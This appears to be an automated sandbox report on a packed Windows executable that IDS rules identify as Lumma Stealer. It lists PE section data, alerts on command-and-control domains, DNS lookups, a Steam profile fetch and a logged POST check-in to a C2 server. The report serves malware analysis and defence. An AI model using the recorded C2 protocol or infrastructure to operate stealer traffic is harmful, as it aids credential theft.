                                                                                                                        Entrypoint:0x8a1000
                                                                                                                        Entrypoint Section:.taggant
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                        Time Stamp:0x66FFF14A [Fri Oct 4 13:44:42 2024 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:6
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:6
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:6
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                        Entrypoint Preview

                                                                                                                        Instruction
                                                                                                                        jmp 00007F23E4F2949Ah

                                                                                                                        Data Directories

                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x5f0570x6b.idata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x5f1f80x8.idata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                        Sections

                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                        0x10000x5d0000x25e003f3753533eb749b2a8728a75ef8f4843False0.9995487830033003data7.981573055299197IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .rsrc 0x5e0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .idata 0x5f0000x10000x200fe72def8b74193a84232a780098a7ce0False0.150390625data1.04205214219471IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        0x600000x2a50000x200402ab8397adf07b5b1cc6370e3785efdunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        qysaqnfj0x3050000x19b0000x19ae003d3c48b9d79264f591bf010da346c52cFalse0.9942368848874353data7.95363051003985IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        cobmpkrb0x4a00000x10000x400d040bffc6cd3f5174c1c2200082dd5ceFalse0.71484375data5.769168864555313IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .taggant0x4a10000x30000x2200cc3b851385ec88255a882a40fb07ecd5False0.006548713235294118DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                        Imports

                                                                                                                        DLLImport
                                                                                                                        kernel32.dlllstrcpy

                                                                                                                        Network Behavior

                                                                                                                        Suricata IDS Alerts

                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                        2024-10-08T21:42:15.720095+02002056471ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)1192.168.2.6536421.1.1.153UDP
                                                                                                                        2024-10-08T21:42:15.735409+02002056485ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)1192.168.2.6575021.1.1.153UDP
                                                                                                                        2024-10-08T21:42:15.749691+02002056483ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)1192.168.2.6583491.1.1.153UDP
                                                                                                                        2024-10-08T21:42:15.759413+02002056481ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)1192.168.2.6505261.1.1.153UDP
                                                                                                                        2024-10-08T21:42:15.798501+02002056479ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)1192.168.2.6593821.1.1.153UDP
                                                                                                                        2024-10-08T21:42:15.817688+02002056477ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)1192.168.2.6548641.1.1.153UDP
                                                                                                                        2024-10-08T21:42:15.833548+02002056475ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)1192.168.2.6579521.1.1.153UDP
                                                                                                                        2024-10-08T21:42:15.845308+02002056473ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)1192.168.2.6566611.1.1.153UDP
                                                                                                                        2024-10-08T21:42:35.148948+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649718104.21.53.8443TCP
                                                                                                                        2024-10-08T21:42:35.148948+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649718104.21.53.8443TCP

                                                                                                                        Network Port Distribution

                                                                                                                        TCP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Oct 8, 2024 21:42:15.871943951 CEST49716443192.168.2.6104.102.49.254
                                                                                                                        Oct 8, 2024 21:42:15.872004986 CEST44349716104.102.49.254192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:15.872097969 CEST49716443192.168.2.6104.102.49.254
                                                                                                                        Oct 8, 2024 21:42:15.875179052 CEST49716443192.168.2.6104.102.49.254
                                                                                                                        Oct 8, 2024 21:42:15.875210047 CEST44349716104.102.49.254192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:16.519450903 CEST44349716104.102.49.254192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:16.519547939 CEST49716443192.168.2.6104.102.49.254
                                                                                                                        Oct 8, 2024 21:42:16.522059917 CEST49716443192.168.2.6104.102.49.254
                                                                                                                        Oct 8, 2024 21:42:16.522079945 CEST44349716104.102.49.254192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:16.522452116 CEST44349716104.102.49.254192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:16.568247080 CEST49716443192.168.2.6104.102.49.254
                                                                                                                        Oct 8, 2024 21:42:16.611449003 CEST44349716104.102.49.254192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:17.050029039 CEST44349716104.102.49.254192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:17.050095081 CEST44349716104.102.49.254192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:17.050101042 CEST49716443192.168.2.6104.102.49.254
                                                                                                                        Oct 8, 2024 21:42:17.050148010 CEST44349716104.102.49.254192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:17.050165892 CEST49716443192.168.2.6104.102.49.254
                                                                                                                        Oct 8, 2024 21:42:17.050170898 CEST44349716104.102.49.254192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:17.050187111 CEST49716443192.168.2.6104.102.49.254
                                                                                                                        Oct 8, 2024 21:42:17.050193071 CEST44349716104.102.49.254192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:17.050219059 CEST49716443192.168.2.6104.102.49.254
                                                                                                                        Oct 8, 2024 21:42:17.050236940 CEST49716443192.168.2.6104.102.49.254
                                                                                                                        Oct 8, 2024 21:42:17.123457909 CEST44349716104.102.49.254192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:17.123529911 CEST44349716104.102.49.254192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:17.123558044 CEST49716443192.168.2.6104.102.49.254
                                                                                                                        Oct 8, 2024 21:42:17.123568058 CEST44349716104.102.49.254192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:17.123594046 CEST49716443192.168.2.6104.102.49.254
                                                                                                                        Oct 8, 2024 21:42:17.123610973 CEST49716443192.168.2.6104.102.49.254
                                                                                                                        Oct 8, 2024 21:42:17.130085945 CEST44349716104.102.49.254192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:17.130158901 CEST49716443192.168.2.6104.102.49.254
                                                                                                                        Oct 8, 2024 21:42:17.130172014 CEST44349716104.102.49.254192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:17.130213976 CEST49716443192.168.2.6104.102.49.254
                                                                                                                        Oct 8, 2024 21:42:17.130220890 CEST44349716104.102.49.254192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:17.130244970 CEST44349716104.102.49.254192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:17.130285025 CEST49716443192.168.2.6104.102.49.254
                                                                                                                        Oct 8, 2024 21:42:17.132671118 CEST49716443192.168.2.6104.102.49.254
                                                                                                                        Oct 8, 2024 21:42:17.132702112 CEST44349716104.102.49.254192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:17.132713079 CEST49716443192.168.2.6104.102.49.254
                                                                                                                        Oct 8, 2024 21:42:17.132720947 CEST44349716104.102.49.254192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:17.168612003 CEST49718443192.168.2.6104.21.53.8
                                                                                                                        Oct 8, 2024 21:42:17.168651104 CEST44349718104.21.53.8192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:17.168730021 CEST49718443192.168.2.6104.21.53.8
                                                                                                                        Oct 8, 2024 21:42:17.169049978 CEST49718443192.168.2.6104.21.53.8
                                                                                                                        Oct 8, 2024 21:42:17.169063091 CEST44349718104.21.53.8192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:17.819331884 CEST44349718104.21.53.8192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:17.819508076 CEST49718443192.168.2.6104.21.53.8
                                                                                                                        Oct 8, 2024 21:42:17.821171999 CEST49718443192.168.2.6104.21.53.8
                                                                                                                        Oct 8, 2024 21:42:17.821185112 CEST44349718104.21.53.8192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:17.821763039 CEST44349718104.21.53.8192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:17.823064089 CEST49718443192.168.2.6104.21.53.8
                                                                                                                        Oct 8, 2024 21:42:17.823098898 CEST49718443192.168.2.6104.21.53.8
                                                                                                                        Oct 8, 2024 21:42:17.823172092 CEST44349718104.21.53.8192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:35.149059057 CEST44349718104.21.53.8192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:35.149292946 CEST44349718104.21.53.8192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:35.149352074 CEST49718443192.168.2.6104.21.53.8
                                                                                                                        Oct 8, 2024 21:42:35.149472952 CEST49718443192.168.2.6104.21.53.8
                                                                                                                        Oct 8, 2024 21:42:35.149497986 CEST44349718104.21.53.8192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:35.149511099 CEST49718443192.168.2.6104.21.53.8
                                                                                                                        Oct 8, 2024 21:42:35.149517059 CEST44349718104.21.53.8192.168.2.6

                                                                                                                        UDP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Oct 8, 2024 21:42:15.720094919 CEST5364253192.168.2.61.1.1.1
                                                                                                                        Oct 8, 2024 21:42:15.729769945 CEST53536421.1.1.1192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:15.735409021 CEST5750253192.168.2.61.1.1.1
                                                                                                                        Oct 8, 2024 21:42:15.747559071 CEST53575021.1.1.1192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:15.749691010 CEST5834953192.168.2.61.1.1.1
                                                                                                                        Oct 8, 2024 21:42:15.758342981 CEST53583491.1.1.1192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:15.759413004 CEST5052653192.168.2.61.1.1.1
                                                                                                                        Oct 8, 2024 21:42:15.779198885 CEST53505261.1.1.1192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:15.798501015 CEST5938253192.168.2.61.1.1.1
                                                                                                                        Oct 8, 2024 21:42:15.816059113 CEST53593821.1.1.1192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:15.817687988 CEST5486453192.168.2.61.1.1.1
                                                                                                                        Oct 8, 2024 21:42:15.826730967 CEST53548641.1.1.1192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:15.833548069 CEST5795253192.168.2.61.1.1.1
                                                                                                                        Oct 8, 2024 21:42:15.843332052 CEST53579521.1.1.1192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:15.845308065 CEST5666153192.168.2.61.1.1.1
                                                                                                                        Oct 8, 2024 21:42:15.856564045 CEST53566611.1.1.1192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:15.859406948 CEST6392553192.168.2.61.1.1.1
                                                                                                                        Oct 8, 2024 21:42:15.867464066 CEST53639251.1.1.1192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:17.144673109 CEST6024653192.168.2.61.1.1.1
                                                                                                                        Oct 8, 2024 21:42:17.158684969 CEST53602461.1.1.1192.168.2.6
                                                                                                                        Oct 8, 2024 21:42:33.241050959 CEST53535171.1.1.1192.168.2.6

                                                                                                                        DNS Queries

                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                        Oct 8, 2024 21:42:15.720094919 CEST192.168.2.61.1.1.10x696bStandard query (0)clearancek.siteA (IP address)IN (0x0001)false
                                                                                                                        Oct 8, 2024 21:42:15.735409021 CEST192.168.2.61.1.1.10xfce0Standard query (0)mobbipenju.storeA (IP address)IN (0x0001)false
                                                                                                                        Oct 8, 2024 21:42:15.749691010 CEST192.168.2.61.1.1.10x7050Standard query (0)eaglepawnoy.storeA (IP address)IN (0x0001)false
                                                                                                                        Oct 8, 2024 21:42:15.759413004 CEST192.168.2.61.1.1.10xd10eStandard query (0)dissapoiznw.storeA (IP address)IN (0x0001)false
                                                                                                                        Oct 8, 2024 21:42:15.798501015 CEST192.168.2.61.1.1.10xf303Standard query (0)studennotediw.storeA (IP address)IN (0x0001)false
                                                                                                                        Oct 8, 2024 21:42:15.817687988 CEST192.168.2.61.1.1.10xe50cStandard query (0)bathdoomgaz.storeA (IP address)IN (0x0001)false
                                                                                                                        Oct 8, 2024 21:42:15.833548069 CEST192.168.2.61.1.1.10x550Standard query (0)spirittunek.storeA (IP address)IN (0x0001)false
                                                                                                                        Oct 8, 2024 21:42:15.845308065 CEST192.168.2.61.1.1.10x5119Standard query (0)licendfilteo.siteA (IP address)IN (0x0001)false
                                                                                                                        Oct 8, 2024 21:42:15.859406948 CEST192.168.2.61.1.1.10x443dStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                        Oct 8, 2024 21:42:17.144673109 CEST192.168.2.61.1.1.10x4146Standard query (0)sergei-esenin.comA (IP address)IN (0x0001)false

                                                                                                                        DNS Answers

                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                        Oct 8, 2024 21:42:15.729769945 CEST1.1.1.1192.168.2.60x696bName error (3)clearancek.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                        Oct 8, 2024 21:42:15.747559071 CEST1.1.1.1192.168.2.60xfce0Name error (3)mobbipenju.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                        Oct 8, 2024 21:42:15.758342981 CEST1.1.1.1192.168.2.60x7050Name error (3)eaglepawnoy.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                        Oct 8, 2024 21:42:15.779198885 CEST1.1.1.1192.168.2.60xd10eName error (3)dissapoiznw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                        Oct 8, 2024 21:42:15.816059113 CEST1.1.1.1192.168.2.60xf303Name error (3)studennotediw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                        Oct 8, 2024 21:42:15.826730967 CEST1.1.1.1192.168.2.60xe50cName error (3)bathdoomgaz.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                        Oct 8, 2024 21:42:15.843332052 CEST1.1.1.1192.168.2.60x550Name error (3)spirittunek.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                        Oct 8, 2024 21:42:15.856564045 CEST1.1.1.1192.168.2.60x5119Name error (3)licendfilteo.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                        Oct 8, 2024 21:42:15.867464066 CEST1.1.1.1192.168.2.60x443dNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                        Oct 8, 2024 21:42:17.158684969 CEST1.1.1.1192.168.2.60x4146No error (0)sergei-esenin.com104.21.53.8A (IP address)IN (0x0001)false
                                                                                                                        Oct 8, 2024 21:42:17.158684969 CEST1.1.1.1192.168.2.60x4146No error (0)sergei-esenin.com172.67.206.204A (IP address)IN (0x0001)false

                                                                                                                        HTTP Request Dependency Graph

                                                                                                                        • steamcommunity.com
                                                                                                                        • sergei-esenin.com

                                                                                                                        HTTPS Proxied Packets

                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        0192.168.2.649716104.102.49.2544436412C:\Users\user\Desktop\file.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-10-08 19:42:16 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                        Host: steamcommunity.com
                                                                                                                        2024-10-08 19:42:17 UTC1870INHTTP/1.1 200 OK
                                                                                                                        Server: nginx
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Date: Tue, 08 Oct 2024 19:42:16 GMT
                                                                                                                        Content-Length: 34837
                                                                                                                        Connection: close
                                                                                                                        Set-Cookie: sessionid=be0686778f7a7e66d6036359; Path=/; Secure; SameSite=None
                                                                                                                        Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                        2024-10-08 19:42:17 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                        2024-10-08 19:42:17 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                                                                        Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                                                                        2024-10-08 19:42:17 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                        Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
                                                                                                                        2024-10-08 19:42:17 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                        Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        1192.168.2.649718104.21.53.84436412C:\Users\user\Desktop\file.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-10-08 19:42:17 UTC264OUTPOST /api HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                        Content-Length: 8
                                                                                                                        Host: sergei-esenin.com
                                                                                                                        2024-10-08 19:42:17 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                        Data Ascii: act=life
                                                                                                                        2024-10-08 19:42:35 UTC776INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 08 Oct 2024 19:42:35 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Set-Cookie: PHPSESSID=pfdt0snu5qm5li69lpdkbqac7p; expires=Sat, 01 Feb 2025 13:28:58 GMT; Max-Age=9999999; path=/
                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=omB6t4WkOhtkDg8UPC1rL2lp7mPhHuObIjFt52MJliO7vyVyTfAJMdsmj8WC2xypONEThi7pQiZtoyT3ntDUK270kReSFargEg%2Fkoaw%2FVyi8%2FqpZjf44iXRpmhMjIl4p9Zg%2Bhg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8cf89d029d57221f-MAN
                                                                                                                        2024-10-08 19:42:35 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                        Data Ascii: aerror #D12
                                                                                                                        2024-10-08 19:42:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Statistics

                                                                                                                        CPU Usage

                                                                                                                        Click to jump to process

                                                                                                                        Memory Usage

                                                                                                                        Click to jump to process

                                                                                                                        High Level Behavior Distribution

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        System Behavior

                                                                                                                        General

                                                                                                                        Target ID:0
                                                                                                                        Start time:15:42:12
                                                                                                                        Start date:08/10/2024
                                                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                        Imagebase:0xb00000
                                                                                                                        File size:1'852'928 bytes
                                                                                                                        MD5 hash:A322B061DA9D5AB15E043189A6931BC2
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        Disassembly

                                                                                                                        Reset < >

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:1%
                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                          Signature Coverage:52.6%
                                                                                                                          Total number of Nodes:57
                                                                                                                          Total number of Limit Nodes:6
